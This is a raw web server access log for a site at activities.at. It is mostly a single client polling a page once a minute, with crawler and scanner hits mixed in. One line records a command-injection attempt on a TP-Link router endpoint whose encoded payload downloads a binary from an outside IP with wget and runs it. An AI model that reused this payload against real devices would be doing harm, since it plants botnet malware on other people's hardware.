178.165.188.60 - - [25/Jul/2024:11:34:58 +0200] "GET /entry.php?id=10271&&ser=900038 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899977" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:34:58 +0200] "GET /gui/javascript/form_form.js?1721900098 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:35:58 +0200] "GET /entry.php?id=10271&&ser=900098 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:35:58 +0200] "GET /gui/javascript/form_form.js?1721900158 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900098" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
45.227.254.49 - - [25/Jul/2024:11:36:29 +0200] "\x03" 400 383 "-" "-"
178.165.188.60 - - [25/Jul/2024:11:36:59 +0200] "GET /entry.php?id=10271&&ser=900158 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=900098" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:36:59 +0200] "GET /gui/javascript/form_form.js?1721900219 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900158" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:37:59 +0200] "GET /entry.php?id=10271&&ser=900219 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=900158" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:37:59 +0200] "GET /gui/javascript/form_form.js?1721900279 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900219" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:38:59 +0200] "GET /entry.php?id=10271&&ser=900279 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900219" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:38:59 +0200] "GET /gui/javascript/form_form.js?1721900339 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900279" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:40:02 +0200] "GET /entry.php?id=10271&&ser=900339 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900279" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:40:02 +0200] "GET /gui/javascript/form_form.js?1721900402 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900339" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:41:02 +0200] "GET /entry.php?id=10271&&ser=900402 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900339" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:41:02 +0200] "GET /gui/javascript/form_form.js?1721900462 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900402" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:42:02 +0200] "GET /entry.php?id=10271&&ser=900462 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=900402" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:42:03 +0200] "GET /gui/javascript/form_form.js?1721900523 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900462" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:43:03 +0200] "GET /entry.php?id=10271&&ser=900523 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=900462" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:43:03 +0200] "GET /gui/javascript/form_form.js?1721900583 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900523" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:44:03 +0200] "GET /entry.php?id=10271&&ser=900583 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900523" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:44:03 +0200] "GET /gui/javascript/form_form.js?1721900643 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900583" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:45:03 +0200] "GET /entry.php?id=10271&&ser=900643 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900583" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:45:04 +0200] "GET /gui/javascript/form_form.js?1721900703 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900643" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:46:04 +0200] "GET /entry.php?id=10271&&ser=900703 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900643" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:46:04 +0200] "GET /gui/javascript/form_form.js?1721900764 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900703" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:47:04 +0200] "GET /entry.php?id=10271&&ser=900764 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900703" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:47:04 +0200] "GET /gui/javascript/form_form.js?1721900824 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900764" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:48:04 +0200] "GET /entry.php?id=10271&&ser=900824 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900764" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:48:04 +0200] "GET /gui/javascript/form_form.js?1721900884 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900824" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:49:05 +0200] "GET /entry.php?id=10271&&ser=900884 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900824" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:49:05 +0200] "GET /gui/javascript/form_form.js?1721900945 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900884" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:50:06 +0200] "GET /entry.php?id=10271&&ser=900945 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=900884" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:50:06 +0200] "GET /gui/javascript/form_form.js?1721901006 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=900945" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:51:07 +0200] "GET /entry.php?id=10271&&ser=901006 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=900945" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:51:07 +0200] "GET /gui/javascript/form_form.js?1721901067 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901006" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:52:07 +0200] "GET /entry.php?id=10271&&ser=901067 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901006" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:52:07 +0200] "GET /gui/javascript/form_form.js?1721901127 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901067" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:53:07 +0200] "GET /entry.php?id=10271&&ser=901127 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901067" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:53:07 +0200] "GET /gui/javascript/form_form.js?1721901187 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901127" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:54:07 +0200] "GET /entry.php?id=10271&&ser=901187 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901127" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:54:08 +0200] "GET /gui/javascript/form_form.js?1721901248 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901187" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:55:08 +0200] "GET /entry.php?id=10271&&ser=901248 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901187" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:55:08 +0200] "GET /gui/javascript/form_form.js?1721901308 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901248" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:56:08 +0200] "GET /entry.php?id=10271&&ser=901308 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901248" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:56:08 +0200] "GET /gui/javascript/form_form.js?1721901368 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901308" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:57:08 +0200] "GET /entry.php?id=10271&&ser=901368 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901308" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:57:09 +0200] "GET /gui/javascript/form_form.js?1721901428 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901368" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:58:09 +0200] "GET /entry.php?id=10271&&ser=901428 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901368" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:58:09 +0200] "GET /gui/javascript/form_form.js?1721901489 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901428" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:59:09 +0200] "GET /entry.php?id=10271&&ser=901489 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901428" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:59:09 +0200] "GET /gui/javascript/form_form.js?1721901549 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901489" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
84.54.51.37 - - [25/Jul/2024:11:59:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.165.188.60 - - [25/Jul/2024:12:00:09 +0200] "GET /entry.php?id=10271&&ser=901549 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901489" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:00:09 +0200] "GET /gui/javascript/form_form.js?1721901609 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901549" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:01:10 +0200] "GET /entry.php?id=10271&&ser=901609 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901549" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:01:10 +0200] "GET /gui/javascript/form_form.js?1721901670 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901609" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:02:10 +0200] "GET /entry.php?id=10271&&ser=901670 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901609" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:02:10 +0200] "GET /gui/javascript/form_form.js?1721901730 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901670" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:03:10 +0200] "GET /entry.php?id=10271&&ser=901730 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901670" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:03:10 +0200] "GET /gui/javascript/form_form.js?1721901790 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901730" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.136 - - [25/Jul/2024:12:03:54 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11600431.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.188.60 - - [25/Jul/2024:12:04:11 +0200] "GET /entry.php?id=10271&&ser=901790 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=901730" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:04:11 +0200] "GET /gui/javascript/form_form.js?1721901851 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901790" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:05:11 +0200] "GET /entry.php?id=10271&&ser=901851 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=901790" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:05:11 +0200] "GET /gui/javascript/form_form.js?1721901911 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901851" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:06:11 +0200] "GET /entry.php?id=10271&&ser=901911 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=901851" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:06:11 +0200] "GET /gui/javascript/form_form.js?1721901971 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901911" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:07:11 +0200] "GET /entry.php?id=10271&&ser=901971 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=901911" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:07:12 +0200] "GET /gui/javascript/form_form.js?1721902031 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=901971" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.135 - - [25/Jul/2024:12:07:14 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010291203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.188.60 - - [25/Jul/2024:12:08:12 +0200] "GET /entry.php?id=10271&&ser=902031 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=901971" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:08:12 +0200] "GET /gui/javascript/form_form.js?1721902092 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902031" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
46.174.191.28 - - [25/Jul/2024:12:08:15 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
178.165.188.60 - - [25/Jul/2024:12:09:12 +0200] "GET /entry.php?id=10271&&ser=902092 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=902031" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:09:12 +0200] "GET /gui/javascript/form_form.js?1721902152 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902092" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.136 - - [25/Jul/2024:12:09:29 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11168266.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.188.60 - - [25/Jul/2024:12:10:12 +0200] "GET /entry.php?id=10271&&ser=902152 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=902092" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:10:12 +0200] "GET /gui/javascript/form_form.js?1721902212 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902152" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:11:13 +0200] "GET /entry.php?id=10271&&ser=902212 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=902152" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:11:13 +0200] "GET /gui/javascript/form_form.js?1721902273 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902212" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:12:13 +0200] "GET /entry.php?id=10271&&ser=902273 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=902212" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:12:13 +0200] "GET /gui/javascript/form_form.js?1721902333 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:13:13 +0200] "GET /entry.php?id=10271&&ser=902333 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=902273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:13:13 +0200] "GET /gui/javascript/form_form.js?1721902393 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902333" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:14:14 +0200] "GET /entry.php?id=10271&&ser=902393 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=902333" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:14:14 +0200] "GET /gui/javascript/form_form.js?1721902454 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902393" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:15:14 +0200] "GET /entry.php?id=10271&&ser=902454 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=902393" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:15:14 +0200] "GET /gui/javascript/form_form.js?1721902514 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902454" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:16:14 +0200] "GET /entry.php?id=10271&&ser=902514 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=902454" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:16:14 +0200] "GET /gui/javascript/form_form.js?1721902574 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902514" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
144.126.220.139 - - [25/Jul/2024:12:16:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36"
139.59.144.173 - - [25/Jul/2024:12:17:01 +0200] "GET /version HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36"
178.165.188.60 - - [25/Jul/2024:12:17:14 +0200] "GET /entry.php?id=10271&&ser=902574 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=902514" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:17:15 +0200] "GET /gui/javascript/form_form.js?1721902635 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902574" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:18:15 +0200] "GET /entry.php?id=10271&&ser=902635 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=902574" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:18:15 +0200] "GET /gui/javascript/form_form.js?1721902695 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902635" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:19:15 +0200] "GET /entry.php?id=10271&&ser=902695 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=902635" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:12:19:15 +0200] "GET /gui/javascript/form_form.js?1721902755 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=902695" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
